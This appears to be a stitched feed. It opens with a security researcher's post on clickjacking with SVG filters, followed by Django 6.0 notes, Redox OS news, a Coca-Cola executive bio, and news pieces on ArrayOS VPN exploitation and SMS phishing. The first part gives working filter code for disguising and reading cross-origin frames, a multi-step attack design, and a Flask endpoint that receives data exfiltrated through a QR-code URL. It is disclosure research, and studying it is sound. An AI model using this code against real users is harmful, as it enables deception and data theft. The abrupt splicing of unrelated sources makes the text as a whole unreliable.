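<!-- invert the thickened text into a white-on-black luma matte -->
<feFlood flood-color="#fff" result="white"/>
<feBlend mode="difference" in="thick" in2="white" result="inverted"/>
<!-- multiply the matte with itself to push greys towards black/white -->
<feComposite operator="arithmetic" k1="1" in="inverted" in2="inverted" result="luma"/>
<!-- move the luminance into the alpha channel to get an alpha matte -->
<feColorMatrix in="luma" type="matrix" values="0 0 0 0 1  0 0 0 0 1  0 0 0 0 1  0.33 0.33 0.33 0 0" result="matte"/>
<!-- keep only the source pixels under the matte -->
<feComposite operator="in" in="SourceGraphic" in2="matte" result="cut"/>
<!-- and put the cut-out text over a white background -->
<feBlend mode="normal" in="cut" in2="white"/>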
Looks pretty good, doesn’t it! If you empty out the box (try it!) you might notice some artifacts that give away what we’ve done, but apart from that it’s a pretty good way to sort of sculpt and form various inputs around a bit for an attack.
There are all sorts of other effects you can add to make the input seem just right. Let’s combine everything together into a complete example of an attack.
You can see how the textbox is entirely recontextualized now to fit a different design while still being fully functional.
Pixel reading
And now we come to what is most likely the most useful attack primitive - pixel reading. That’s right, you can use SVG filters to read color data off of images and perform all sorts of logic on them to create really advanced and convincing attacks.
The catch is of course, that you’ll have to do everything within SVG filters - there is no way to get the data out
6
. Despite that, it is very powerful if you get creative with it.
On a higher level, what this lets us do is make everything in a clickjacking attack responsive - fake buttons can have hover effects, pressing them can show fake dropdowns and dialogs, and we can even have fake form validation.
Let’s start off with a simple example - detecting if a pixel is pure black, and using it to turn another filter on or off.
<--- very cool! click to change color
For this target, we want to detect when the user clicks on the box to change its color, and use that to toggle a blur effect.
All the examples from here onwards are broken on Safari. Use Firefox or Chrome if you don't see them.
Let’s start off by using two copies of the
feTile
filter to first crop out the few pixels we’re interested in and then tile those pixels across the entire image.
The result is that we now have the entire screen filled with the color of the area we are interested in.
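In filter terms, that crop-and-tile read could be sketched like this (coordinates are illustrative; the same feTile pairing shows up again in the adder later on):
<!-- crop to the few pixels we care about -->
<feTile in="SourceGraphic" x="22" y="22" width="4" height="4"/>
<!-- tile that tiny region across the whole filter area -->
<feTile x="0" y="0" width="100%" height="100%" result="sample"/>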
<--- very cool! click to change color
<feComposite operator=arithmetic k2=100 />
We can turn this result into a binary on/off value by using
feComposite
’s arithmetic the same way as in the last section, but with a way larger
k2
value. This makes it so that the output image is either completely black or completely white.
And just as before, this can be used as a mask. We once again convert it into an alpha matte, but this time apply it to the blur filter.
So that’s how you can find out whether a pixel is black and use that to toggle a filter!
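Wired together, one hedged way to finish the toggle looks like this, continuing from a thresholded black/white result named flag (the blur radius and matrix values are my own choices, not the demo’s):
<!-- blurred copy of the whole page -->
<feGaussianBlur in="SourceGraphic" stdDeviation="6" result="blurred"/>
<!-- turn the black/white flag into an alpha matte -->
<feColorMatrix in="flag" type="matrix" values="0 0 0 0 1  0 0 0 0 1  0 0 0 0 1  0.33 0.33 0.33 0 0" result="mask"/>
<!-- keep the blurred copy only where the flag is white... -->
<feComposite operator="in" in="blurred" in2="mask" result="maybeblur"/>
<!-- ...and lay it over the untouched page -->
<feBlend mode="normal" in="maybeblur" in2="SourceGraphic"/>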
<--- very cool! click to change color
Uh oh! It seems that somebody has changed the target to have a pride-themed button instead!
How can we adapt this technique to work with arbitrary colors and textures?
<--- very cool! click to change color
<!-- crop to first stripe of the flag -->
<feTile x="22" y="22" width="4" height="4"/>
<feTile x="0" y="0" result="col" width="100%" height="100%"/>
<!-- generate a color to diff against -->
<feFlood flood-color="#5BCFFA" result="blue"/>
<feBlend mode="difference" in="col" in2="blue"/>
<!-- k4 is for more lenient threshold -->
<feComposite operator=arithmetic k2=100 k4=-5/>
<!-- do the masking and blur stuff... -->
...
The solution is pretty simple - we can simply use
feBlend
’s difference combined with a
feColorMatrix
to join the color channels to turn the image into a similar black/white matte as before. For textures we can use
feImage
, and for non-exact colors we can use a bit of
feComposite
’s arithmetic to make the matching threshold more lenient.
And that’s it, a simple example of how we can read a pixel value and use it to toggle a filter.
Logic gates
But here’s the part where it gets fun! We can repeat the pixel-reading process to read out multiple pixels, and then run logic on them to program an attack.
By using
feBlend
and
feComposite
, we can recreate all logic gates and make SVG filters
functionally complete
. This means that we can program anything we want, as long as it is not timing-based
7
and doesn’t take up too many resources
8
.
Input:
NOT:
<feBlend mode=difference in2=white />
AND:
<feComposite operator=arithmetic k1=1 />
OR:
<feComposite operator=arithmetic k2=1 k3=1 />
XOR:
<feBlend mode=difference in=a in2=b />
NAND:
(AND + NOT)
NOR:
(OR + NOT)
XNOR:
(XOR + NOT)
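For example, a composed NAND is just the AND arithmetic chained straight into the difference-based NOT (reusing a, b and a white feFlood result, as in the gates above):
<feComposite operator=arithmetic k1=1 in=a in2=b />
<feBlend mode=difference in2=white />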
These logic gates are what modern computers are made of. You could build a computer within an SVG filter if you wanted to. In fact, here’s a basic calculator I made:
This is a full adder circuit. This filter implements A ⊕ B ⊕ C for the output and (A ∧ B) ∨ (C ∧ (A ⊕ B)) for the carry bit using the logic gates described above. There are more efficient ways to implement an adder in SVG filters, but this is meant to serve as proof of the ability to implement arbitrary logic circuits.
<!-- util -->
<feOffset in="SourceGraphic" dx="0" dy="0" result=src/>
<feTile x="16px" y="16px" width="4" height="4" in=src/>
<feTile x="0" y="0" width="100%" height="100%" result=a/>
<feTile x="48px" y="16px" width="4" height="4" in=src/>
<feTile x="0" y="0" width="100%" height="100%" result=b/>
<feTile x="72px" y="16px" width="4" height="4" in=src/>
<feTile x="0" y="0" width="100%" height="100%" result=c/>
<feFlood flood-color=#FFF result=white/>
<!-- A ⊕ B -->
<feBlend mode=difference in=a in2=b result=ab/>
<!-- [A ⊕ B] ⊕ C -->
<feBlend mode=difference in2=c/>
<!-- Save result to 'out' -->
<feTile x="96px" y="0px" width="32" height="32" result=out/>
<!-- C ∧ [A ⊕ B] -->
<feComposite operator=arithmetic k1=1 in=ab in2=c result=abc/>
<!-- (A ∧ B) -->
<feComposite operator=arithmetic k1=1 in=a in2=b/>
<!-- [A ∧ B] ∨ [C ∧ (A ⊕ B)] -->
<feComposite operator=arithmetic k2=1 k3=1 in2=abc/>
<!-- Save result to 'carry' -->
<feTile x="64px" y="32px" width="32" height="32" result=carry/>
<!-- Combine results -->
<feBlend in2=out/>
<feBlend in2=src result=done/>
<!-- Shift first row to last -->
<feTile x="0" y="0" width="100%" height="32"/>
<feTile x="0" y="0" width="100%" height="100%" result=lastrow/>
<feOffset dx="0" dy="-32" in=done/>
<feBlend in2=lastrow/>
<!-- Crop to output -->
<feTile x="0" y="0" width="100%" height="100%"/>
Anyways, for an attacker, what all of this means is that you can make a multi-step clickjacking attack with lots of conditions and interactivity. And you can run logic on data from cross-origin frames.
Securify
Welcome to this secure application!
This is an example target where we want to trick the user into marking themselves as hacked, which requires a few steps:
Clicking a button to open a dialog
Waiting for the dialog to load
Clicking a checkbox within the dialog
Clicking another button in the dialog
Checking for the red text that appeared
Securify
Welcome to this secure application!
Win free iPod by following the steps below.
1. Click here
2. Wait 3 seconds
3. Click
4. Click here
A traditional clickjacking attack against this target would be difficult to pull off. You’d need to have the user click on multiple buttons in a row with no feedback in the UI.
There are some tricks you could do to make a traditional attack more convincing than what you see above, but it’s still gonna look sketch af. And the moment you throw something like a text input into the mix, it’s just not gonna work.
Anyways, let’s build out a logic tree for a filter-based attack:
Play around with this and see just how much more convincing it is as an attack. And we could easily make it better by, for example, adding some extra logic to also add hover visuals to the buttons. The demo has debug visuals for the four inputs (D, L, C, R) in the bottom left as squares to make it easier to understand what’s going on.
But yeah, that’s how you can make complex and long clickjacking attacks that have not been realistic with the traditional clickjacking methods.
I kept this example here pretty short and simple, but real-world attacks can be a lot more involved and polished.
In fact…
The Docs bug
I’ve actually managed to pull off this attack against Google Docs!
Makes the user click on the “Generate Document” button
Once pressed, detects the popup and shows a textbox for the user to type a “captcha” into
The textbox starts off with a gradient animation, which must be handled
The textbox has focus states, which must also be present in the attack visuals, so they must be detected by the background color of the textbox
The textbox has grey text for both a placeholder AND suggestions, which must be hidden with the technique discussed earlier
Once the captcha is typed, makes the user seemingly click on a button (or press enter), which causes a suggested Docs item to be added into the textbox
This item must be detected by looking for its background color in the textbox
Once the item is detected, the textbox must be hidden and another button must be shown instead
Once that button is clicked, a loading screen appears, which must be detected
If the loading screen is present, or the dialog is not visible and the “Generate Document” button is not present, the attack is over and the final screen must be shown
In the past, individual parts of such an attack could’ve been pulled off through traditional clickjacking and some basic CSS, but the entire attack would’ve been way too long and complex to be realistic. With this new technique of running logic inside SVG filters, such attacks become realistic.
Google VRP awarded me
$3133.70
for the find. That was, of course,
right before
they introduced a novelty bonus for new vulnerability classes. Hmph!
10
The QR attack
Something I see in online discussions often is the insistence on QR codes being dangerous. It kind of rubs me the wrong way because QR codes are not any more dangerous than links.
I don’t usually comment on this too much because it’s best to avoid suspicious links, and the same goes for QR codes, but it does nag me to see people make QR codes out to be this evil thing that can somehow immediately hack you.
It turns out though, that my SVG filters attack technique can be applied to QR codes as well!
The example from earlier in the blog with retyping a code becomes impractical once the user realizes they’re typing something they shouldn’t. We can’t stuff the data we exfiltrate into a link either, because an SVG filter cannot create a link.
But since an SVG filter can run logic and provide visual output, perhaps we could generate a QR code with a link instead?
Creating the QR
Creating a QR code within an SVG filter is easier said than done however. We can shape binary data into the shape of a QR code by using
feDisplacementMap
, but for a QR code to be scannable it also needs error correction data.
QR codes use
Reed-Solomon error correction
, which is some fun math stuff that’s a bit more advanced than a simple checksum. It does math with polynomials and stuff and that is a bit annoying to reimplement in an SVG.
Luckily for us, I’ve faced the same problem before! Back in 2021 I was the first person
11
to
make a QR code generator in Minecraft
, so I’ve already figured out the things necessary.
In my build I pre-calculated some lookup tables for the error correction, and used those instead to make the build simpler - and we can do the same with the SVG filter.
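I won’t spoil the full filter, but to give a flavour of how a lookup table can live inside one: a discrete feComponentTransfer maps each input level to a precomputed output, which is the shape a log/antilog table needs. The tableValues below are placeholders rather than the real Reed-Solomon tables, and I’m not claiming the actual filter is built exactly this way:
<!-- 'databyte' is a hypothetical earlier result holding the value to look up -->
<feComponentTransfer in="databyte" result="looked-up">
  <feFuncR type="discrete" tableValues="0 0.25 0.5 0.75 1 0.75 0.5 0.25"/>
  <feFuncG type="discrete" tableValues="0 0.25 0.5 0.75 1 0.75 0.5 0.25"/>
  <feFuncB type="discrete" tableValues="0 0.25 0.5 0.75 1 0.75 0.5 0.25"/>
</feComponentTransfer>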
This post is already getting pretty long, so I’ll leave figuring out how this filter works as an exercise to the reader ;).
Hover to see QR
This is a demo that displays a QR code telling you how many seconds you’ve been on this page for. It’s a bit fiddly, so if it doesn’t work make sure that you aren’t using any
display scaling
or
a custom color profile
. On Windows you can toggle the
Automatically manage color for apps
setting, and on a Mac you can set the color profile to sRGB for it to work.
This demo
does not work on mobile devices
. And also, for the time being,
it only works in Chromium-based browsers
, but I believe it could be made to work in Firefox too.
Similarly, in a real attack, the scaling and color profile issues could be worked around using some JavaScript tricks or simply by implementing the filter a bit differently - this here is just a proof of concept that’s a bit rough around the edges.
But yeah, that’s a QR code generator built inside an SVG filter!
Took me a while to make, but I didn’t want to write about it just being “theoretically possible”.
Attack scenario
So the attack scenario with the QR code is that you’d read pixels from a frame, process them to extract the data you want, encode them into a URL that looks something like https://lyra.horse/?ref=c3VwZXIgc2VjcmV0IGluZm8 and render it as a QR code.
Then, you prompt the user to scan the QR code for whatever reason (eg anti-bot check). To them, the URL will seem like just a normal URL with a tracking ID or something in it.
Once the user opens the URL, your server gets the request and receives the data from the URL.
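The receiving side needs nothing special; here’s a hedged sketch of such a collection endpoint (framework and route are illustrative, not anything from an actual attack):
import base64
from flask import Flask, request

app = Flask(__name__)

@app.route("/")
def collect():
    # The SVG filter packed the stolen bits into the ?ref= parameter as base64.
    ref = request.args.get("ref", "")
    data = base64.b64decode(ref + "=" * (-len(ref) % 4)).decode("utf-8", "replace")
    print("exfiltrated:", data)  # "super secret info" for the example URL above
    return "Thanks for verifying!"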
And so on..
There are so many ways to make use of this technique I won’t have time to go over them all in this post. Some examples would be reading text by using the difference blend mode, or exfiltrating data by making the user click on certain parts of the screen.
You could even insert data from the outside to have a fake mouse cursor inside the SVG that shows the pointer cursor and reacts to fake buttons inside your SVG to make the exfiltration more realistic.
Or you could code up attacks with CSS and SVG where CSP doesn’t allow for any JS.
Anyways, this post is long as is, so I’ll leave figuring out these techniques as homework.
Novel technique
This is the first time in my security research I’ve found a completely new technique!
I introduced it briefly at
my BSides talk in September
, and this post here is a more in-depth overview of the technique and how it can be used.
Of course, you can never know 100% for sure that a specific type of attack has never been found by anyone else, but my extensive search of existing security research has come up with nothing, so I suppose I can crown myself as the researcher who discovered it?
Another example of logic gates in SVG I found after writing my blog. It’s fun because it comes with
reddit
and
hn
threads - I particularly like the comment asking about whether this turing completeness is useful or just a fun fact, which got a reply confirming the latter.
I like turning fun facts into vulnerabilities ^^.
Note that whether SVG filters are actually Turing complete is questionable, because filters run in constant time and can’t loop. This doesn’t mean they can’t be Turing complete, but it also doesn’t prove that they are.
I don’t think me discovering this technique was just luck though. I have a history of seeing things such as CSS as programming languages to exploit and be creative with. It wasn’t a stretch for me to see SVG filters as a programming language either.
That, and my overlap between security research and creative projects - I often blur the lines between the two, which is what
Antonymph
was born out of.
In any case,
it feels
yay
:3
woof
yippie
waow
awesome
meow
awrf
to discover
something like this.
afterword
whoa this post took such a long time for me to get done!
i started work on it in july, and was expecting to release it alongside
my CSS talk
in september, but it has taken me so much longer than expected to actually finish this thing. i wanted to make sure it was a good in-depth post, rather than something i just get out as soon as possible.
unlike my previous posts, i did unfortunately have to break my trend of using no images, since i needed a few data URIs within the SVG filters for demos. still, no images anywhere else in the post, no javascript, and just 42kB (gzip) of handcrafted html/css/svg.
also, i usually hide a bunch of easter eggs in my post that link to stuff i’ve enjoyed recently, but i have a couple links i didn’t want to include without content warnings.
finding responsibility
is a pretty dark talk about the ethics of making sure your work won’t end up killing people, and
youre the one ive always wanted
is slightly nsfw doggyhell vent art.
btw i’ll soon be giving talks at
39c3
and
disobey 2026
! the 39c3 one is titled “
css clicker training
” and will be about css crimes and making games in css. and the disobey one is the same talk as the bsides one about using css to hack stuff and get bug bounties, but i’ll make sure to throw some extra content in there to keep it fun.
see y’all around!!
<3
Note: If you’re making content (articles, videos etc) based on this post, feel free to reach out to me to ask questions or get feedback.
Django 6.0 released
Django 6.0 includes a flurry of neat features, but the two that most caught my eye are background workers and template partials.
Background workers started out as DEP (Django Enhancement Proposal) 14, proposed and shepherded by Jake Howard. Jake prototyped the feature in django-t...
Kevin Wetzels published a useful
first look at Django's background tasks
based on the earlier RC, including notes on building a custom database-backed worker implementation.
Template Partials
were implemented as a Google Summer of Code project by Farhan Ali Raza. I really like the design of this. Here's an example from
the documentation
showing the neat
inline
attribute which lets you both use and define a partial at the same time:
{# Define and render immediately. #}
{% partialdef user-info inline %}
  <div id="user-info-{{ user.username }}">
    <h3>{{ user.name }}</h3>
    <p>{{ user.bio }}</p>
  </div>
{% endpartialdef %}

{# Other page content here. #}

{# Reuse later elsewhere in the template. #}
<section class="featured-authors">
  <h2>Featured Authors</h2>
  {% for user in featured %}
    {% partial user-info %}
  {% endfor %}
</section>
You can also render just a named partial from a template directly in Python code like this:
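Assuming Django 6.0 keeps the template.html#partial-name addressing from django-template-partials, that looks something like this (the template path and context object are illustrative):
from django.template.loader import render_to_string

# A stand-in object with the attributes the partial uses.
class User:
    username, name, bio = "ada", "Ada Lovelace", "Wrote the first program."

# Render only the "user-info" partial from the template above.
html = render_to_string("authors/list.html#user-info", {"user": User()})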
I take tap dance evening classes at the
College of San Mateo
community college. A neat bonus of this is that I'm now officially a student of that college, which gives me access to their library... including the ability to send text messages to the librarians asking for help with research.
I recently wrote about
Coutellerie Nontronnaise
on my Niche Museums website, a historic knife manufactory in Nontron, France. They had
a certificate on the wall
claiming that they had previously held a Guinness World Record for the smallest folding knife, but I had been unable to track down any supporting evidence.
I posed this as a text message challenge to the librarians, and they tracked down
the exact page
from the 1989 "Le livre guinness des records" describing the record!
Le plus petit (“The smallest”)
The Établissements Nontronnaise made a knife 10 mm long for the Festival d’Aubigny, Vendée, which took place on 4–5 July 1987.
WebKitGTK3 web browser example and bottom system monitor
Redox OS is a complete Unix-like general-purpose microkernel-based operating system
written in Rust. November was a very exciting month for Redox! Here’s all the latest news.
Donate to Redox
If you would like to support Redox, please consider donating or buying some merch!
Jeremy Soller successfully ported the
Smallvil
Wayland compositor example from the
Smithay
framework and GTK3 Wayland to Redox.
Special thanks to Ibuki Omatsu (Unix Domain Socket implementation and bug fixing),
Wildan Mubarok (bug fixing and implementation of missing functions),
and other contributors for making it possible.
Smallvil performance on Redox is not adequate, so we still have work to do on Wayland support,
but this represents a huge step forward.
GTK3 Wayland Demo running on Smallvil compositor
WebKitGTK on Redox!
Jeremy Soller and Wildan Mubarok successfully ported and fixed WebKitGTK (GTK 3.x frontend) and its web browser example on Redox. Thanks again to the other contributors who helped us achieve this.
This is the first full-featured browser engine ported to Redox, allowing most websites to work.
MATE Desktop on Redox!
While porting MATE Marco to get a better X11 window manager, Jeremy Soller decided to port a basic MATE desktop as well.
More Boot Fixes
Jeremy Soller added and fixed many driver timeouts to stop infinite-loop bugs from blocking boot. He also updated system components and drivers to daemonize after starting and moved hardware initialization into their child processes, fixing hangs and allowing the boot to continue on more hardware.
If you have a computer that hangs on Redox boot we recommend that you test again with the latest daily image.
Migration to i586
The Rust upstream migrated the i686 CPU targets to i586. The Redox build system and documentation have been updated to use
i586
as the CPU architecture target name for 32-bit x86 computers.
Jeremy Soller and Wildan Mubarok implemented a feature that lets recipes declare which build tools they need, with those build tools themselves available as recipes. This brings the following benefits:
Simplifies the Redox build system, so applications, libraries, and build tools use the same build environment and packaging system
Greatly reduces build system configuration time in both Podman and Native builds,
as developers will only install the build tools for the recipes that they are using
Removes the maintenance effort of updating the list of build tool packages required for each Unix-like platform whenever a build tool package is added for the Native Build
Jeremy Soller unified the build system repositories,
merging the submodules into the
main build system repository
.
This will help to simplify build system improvements, keep everything synchronized, and allow faster development and testing.
If you haven’t updated your build system yet, you should backup your changes,
and either run the
make distclean pull container_clean all
command, or download a new build system copy (
git clone https://gitlab.redox-os.org/redox-os/redox.git
)
and build from scratch.
More GitLab Protection
After suffering frequent GitLab slowdowns, we discovered that bots were using our CI for cryptomining (again)
and AI scrapers were consuming the server resources making it very slow.
As a consequence, we increased our protection, which changed some things:
By default, only maintainers can run CI jobs.
If you are working on solving CI problems, let us know and we can discuss temporary access to CI.
Git code push using SSH has been disabled until we find a way to fix it.
All contributors will need to use HTTPS with a PAT (Personal Access Token) for
git push
usage.
(kernel) 4lDO2 fixed a memory allocator panic and data corruption bug
(kernel) Jeremy Soller enabled serial interrupts in ARM64 ACPI
(kernel) Jeremy Soller implemented nested event queues
(kernel) Jeremy Soller implemented
kfpath
in some schemes
(kernel) Jeremy Soller implemented
F_DUPFD_CLOEXEC
(kernel) Jeremy Soller improved the futex lockup performance
(kernel) Jeremy Soller improved CPU stat accuracy
(kernel) Jeremy Soller improved the i586 CPU stats
(kernel) Jeremy Soller fixed an event queue race condition with pipes
(kernel) Jeremy Soller reduced warnings for legacy scheme path on GUI applications
(kernel) Anhad Singh fixed some deadlocks
(kernel) bjorn3 did some code cleanups
(kernel) AArch Angel implemented
kfpath
on DTB scheme
Driver Improvements
(drivers) Jeremy Soller fixed missing PCI devices in Intel Arrow Lake computers
(drivers) Jeremy Soller improved the PS/2 driver stability
(drivers) Jeremy Soller improved the Intel HD Audio driver error handling
(drivers) Jeremy Soller implemented unaligned access on the PCI driver
(drivers) Ibuki Omatsu updated the
alxd
,
ihdad
,
ac97d
, and
sb16d
drivers to use the
redox-scheme
library, which makes them up-to-date
(drivers) bjorn3 unified the interrupt vector handling code between the Intel HD Audio and Realtek ethernet drivers
(drivers) bjorn3 merged the
drivers
repository into the
base
repository. It will allow faster development and testing, especially for driver initialization, and simplify configuration.
System Improvements
(sys) Jeremy Soller improved log verbosity on system bootstrap
(sys) Jeremy Soller implemented support for
MSG_DONTWAIT
in Unix Domain Sockets
(sys) Jeremy Soller implemented
SO_PEERCRED
in Unix streams
(sys) Jeremy Soller implemented the
fpath()
function in the
proc
scheme
(sys) Jeremy Soller implemented the
fstat()
function in the IPC daemon
(sys) Jeremy Soller did a refactor of
fevent()
function handling
(sys) Jeremy Soller fixed
SO_SNDBUF
in IPC daemon
(sys) Jeremy Soller replaced the Smith text editor by Kibi in the
minimal
variants
(sys) bjorn3 reduced the uutils compilation time by a third (2m50s to 1m56s on his computer) by using
ThinLTO
instead of
FatLTO
(sys) bjorn3 fixed some code warnings
Relibc Improvements
(libc) 4lDO2 implemented a macro to verify if the relibc internal definitions match the Rust libc crate definitions
(libc) Jeremy Soller implemented the
sys/queue.h
function group
(libc) Jeremy Soller improved the TLS alignment reliability
(libc) Jeremy Soller improved the safety of programs that close file descriptors in a range
(libc) Jeremy Soller implemented the
ppoll()
function
(libc) Jeremy Soller fixed a possible POSIX thread key collision
(libc) Jeremy Soller fixed the
ai_addrlen
and
socklen_t
type definitions
(libc) Josh Megnauth implemented the
posix_fallocate()
function
(libc) Ibuki Omatsu fixed the
getpeername()
function in Unix Streams
(libc) Wildan Mubarok fixed the
getsubopt()
function
(libc) auronandace improved the documentation of some POSIX functions
Networking Improvements
(net) Wildan Mubarok improved the network stack error handling
RedoxFS Improvements
(redoxfs) Jeremy Soller updated the
fpath()
function to use the new scheme format
(redoxfs) Jeremy Soller fixed a panic due to inline data overflow
Orbital Improvements
(gui) bjorn3 did some code refactorings
(gui) Wildan Mubarok fixed the
orbclient
example
(gui) Wildan Mubarok optimized the
orbclient
library gradient calculation
Programs
(programs) Jeremy Soller updated the Rust recipe version to match the Redox cross-compiler on Linux
(programs) Jeremy Soller enabled DRI3 on Mesa3D and X11
(programs) Jeremy Soller updated GnuTLS to use dynamic linking
(programs) Jeremy Soller fixed the Luanti and
librsvg
compilation
(programs) Wildan Mubarok ported the EGL code from Mesa3D
(programs) Wildan Mubarok fixed OpenLara and Rustual Boy compilation
(programs) Anhad Singh fixed the Fish shell execution
Packaging Improvements
(pkg) Wildan Mubarok started to implement recipe features which will allow more flexibility with software options
(pkg) Wildan Mubarok implemented recursive recipe dependencies which will allow us to use implicit dependencies (remove duplicated dependencies) and reduce maintenance cost
(pkg) Wildan Mubarok implemented package size and BLAKE3 hash in the package information, which allows an accurate download progress bar and package update verification
(pkg) Wildan Mubarok fixed the package manager not detecting installed packages from the build system
Debugging Improvements
(debug) Jeremy Soller implemented the support for userspace stack traces
(debug) Jeremy Soller reduced unnecessary logging on system components and drivers to ease boot problem reporting
Build System Improvements
(build) Wildan Mubarok implemented an option (the FSTOOLS_IN_PODMAN environment variable) to build and run the filesystem tools in the Podman container; this fixes a problem with FUSE on macOS, NixOS, and GuixSD
(build) Wildan Mubarok updated the Cargo recipe template to use dynamic linking
(build) Wildan Mubarok improved
REPO_BINARY
option to cache downloaded packages between image rebuilds
(build) Wildan Mubarok updated Cookbook unfetch to also clean recipe binaries, removing the need to use the
uc.recipe
recipe target
(build) Wildan Mubarok did a code simplification in Cookbook which reduced dependencies
(build) Wildan Mubarok did a code simplification in the installer which reduced most dependencies
(build) Wildan Mubarok fixed some breaking changes after the Rust implementation of Cookbook
(build) Wildan Mubarok fixed the Nix flake (not tested on NixOS, only the package manager on Debian)
(build) Wildan Mubarok fixed the MacOS support on Apple Silicon
(build) Wildan Mubarok configured the default GNU FTP mirror to be the Berkeley university mirror, fixing the occasionally very slow downloads of source tarballs
(build) Ribbon fixed missing ARM64 and RISC-V emulators and reduced the QEMU installation time and size by only installing the emulators for the CPU architectures supported by Redox
Redoxer Improvements
(redoxer) Wildan Mubarok implemented a way to build and run tests from C/C++ programs
(redoxer) Wildan Mubarok fixed the toolchain downloading for Linux ARM64 distributions
(redoxer) Wildan Mubarok did a code simplification in Redoxer which reduced dependencies by half
Documentation Improvements
(doc) Ribbon updated and improved the
Coding and Building
page, now it has fully up-to-date information
(doc) Ribbon updated and improved some book pages to use the new recipe push feature to save development time
(doc) Ribbon documented the
REPO_OFFLINE
(offline mode) environment variable
(doc) Ribbon documented the
make cook
(Build the filesystem enabled recipes),
make push
(only install recipe packages with changes in an existing QEMU image),
make tree
(show the filesystem configuration recipes and recipe dependencies tree),
make find
(show recipe packages location), and
make mount_live
(mount the live disk ISO) commands
(doc) Ribbon documented the
make x.--all
(run a recipe option in all recipes) and
make x.--category-category-name
(run a recipe option in a recipe category folder) commands
(doc) Ribbon documented the
source.shallow_clone
data type (to enable Git shallow clone in recipes)
(doc) Ribbon moved the Cookbook package policy to the
Application Porting
page and improved the recipe TODO suggestions
(doc) Wildan Mubarok documented the
CI
(disable parallel recipe fetch/build and Cookbook TUI),
COOKBOOK_MAKE_JOBS
(set the number of CPU threads for recipe compilation),
COOKBOOK_VERBOSE
(enable more recipe log information) and
COOKBOOK_LOGS
(option to save recipe logs at
build/logs/$TARGET
) environment variables
(doc) Wildan Mubarok moved the Cookbook recipe tarball mirror documentation to the “Configuration Settings” page
To test the changes of this month download the
server
or
desktop
variants of the
daily images
.
Use the
desktop
variant for a graphical interface. If you prefer a terminal-style interface, or if the
desktop
variant doesn’t work, please try the
server
variant.
If you want to test in a virtual machine use the “harddrive” images
If you want to test on real hardware use the “livedisk” images
Read the following pages to learn how to use the images in a virtual machine or real hardware:
Roberto Mercade is president of The McDonald’s Division (TMD) of The Coca‑Cola Company. He leads a global organization that is responsible for the company’s key relationship with McDonald's in more than 100 markets.
Mercade has been with Coca‑Cola since 1992, when he began his career as a production services manager in Puerto Rico. He went on to hold a number of roles before being named general manager of the Venezuela & Caribbean franchise unit in 2006.
In 2011, he became general manager in South Africa. In 2014, Mercade moved to Australia to lead the South Pacific business unit.
He returned to Latin America in 2018 as president of the Latin Center business unit. In 2021, he became the Mexico zone president.
Mercade holds a degree in industrial engineering from the Georgia Institute of Technology.
Hackers are exploiting ArrayOS AG VPN flaw to plant webshells
Bleeping Computer
www.bleepingcomputer.com
2025-12-04 23:05:05
Threat actors have been exploiting a command injection vulnerability in Array AG Series VPN devices to plant webshells and create rogue users.
Array Networks fixed the vulnerability in a May security update, but has not assigned a CVE identifier, which complicates tracking the flaw and patch management.
An advisory from the Japan Computer Emergency Response Team Coordination Center (JPCERT/CC) warns that hackers have been exploiting the vulnerability since at least August in attacks targeting organizations in the country.
The agency reports that the attacks originate from the IP address 194.233.100[.]138, which is also used for communications.
“In the incidents confirmed by JPCERT/CC, a command was executed attempting to place a PHP webshell file in the path /ca/aproxy/webapp/,” reads the bulletin (machine translated).
The flaw impacts ArrayOS AG 9.4.5.8 and earlier versions, including AG Series hardware and virtual appliances with the ‘DesktopDirect’ remote access feature enabled.
JPCERT says that
Array OS version 9.4.5.9
addresses the problem and provides the following workarounds if updating is not possible:
If the DesktopDirect feature is not in use, disable all DesktopDirect services
Use URL filtering to block access to URLs containing a semicolon
Array Networks AG Series is a line of secure access gateways that rely on SSL VPNs to create encrypted tunnels for secure remote access to corporate networks, applications, desktops, and cloud resources.
Typically, they are used by large organizations and enterprises that need to facilitate remote or mobile work.
Macnica’s security researcher,
Yutaka Sejiyama
, reported on X that his scans returned 1,831 ArrayAG instances worldwide, primarily in China, Japan, and the United States.
The researcher verified that at least 11 hosts have the DesktopDirect feature enabled, but cautioned that many more hosts likely have it active.
“Because this product’s user base is concentrated in Asia and most of the observed attacks are in Japan, security vendors and security organizations outside Japan have not been paying close attention,” Sejiyama told BleepingComputer.
BleepingComputer contacted Array Networks to ask whether they plan to publish a CVE-ID and an official advisory for the actively exploited flaw, but a reply was not available by publication time.
Last year, CISA warned about active exploitation
targeting CVE-2023-28461
, a critical remote code execution in Array Networks AG and vxAG ArrayOS.
SMS Phishers Pivot to Points, Taxes, Fake Retailers
Krebs
krebsonsecurity.com
2025-12-04 23:02:34
China-based phishing groups blamed for non-stop scam SMS messages about a supposed wayward package or unpaid toll fee are promoting a new offering, just in time for the holiday shopping season: Phishing kits for mass-creating fake but convincing e-commerce websites that convert customer payment card data into mobile wallets from Apple and Google. Experts say these same phishing groups also are now using SMS lures that promise unclaimed tax refunds and mobile rewards points.
Over the past week, thousands of domain names were registered for scam websites that purport to offer
T-Mobile
customers the opportunity to claim a large number of rewards points. The phishing domains are being promoted by scam messages sent via Apple’s iMessage service or the functionally equivalent RCS messaging service built into Google phones.
An instant message spoofing T-Mobile says the recipient is eligible to claim thousands of rewards points.
The website scanning service
urlscan.io
shows
thousands of these phishing domains have been deployed in just the past few days alone. The phishing websites will only load if the recipient visits with a mobile device, and they ask for the visitor’s name, address, phone number and payment card data to claim the points.
A phishing website registered this week that spoofs T-Mobile.
If card data is submitted, the site will then prompt the user to share a one-time code sent via SMS by their financial institution. In reality, the bank is sending the code because the fraudsters have just attempted to enroll the victim’s phished card details in a mobile wallet from Apple or Google. If the victim also provides that one-time code, the phishers can then
link the victim’s card to a mobile device that they physically control
.
Pivoting off these T-Mobile phishing domains in urlscan.io reveals a similar scam targeting
AT&T
customers:
An SMS phishing or “smishing” website targeting AT&T users.
Ford Merrill
works in security research at
SecAlliance
, a
CSIS Security Group
company. Merrill said multiple China-based cybercriminal groups that sell phishing-as-a-service platforms have been using the mobile points lure for some time, but the scam has only recently been pointed at consumers in the United States.
“These points redemption schemes have not been very popular in the U.S., but have been in other geographies like EU and Asia for a while now,” Merrill said.
A review of other domains flagged by urlscan.io as tied to this Chinese SMS phishing syndicate shows they are also spoofing U.S. state tax authorities, telling recipients they have an unclaimed tax refund. Again, the goal is to phish the user’s payment card information and one-time code.
A text message that spoofs the District of Columbia’s Office of Tax and Revenue.
CAVEAT EMPTOR
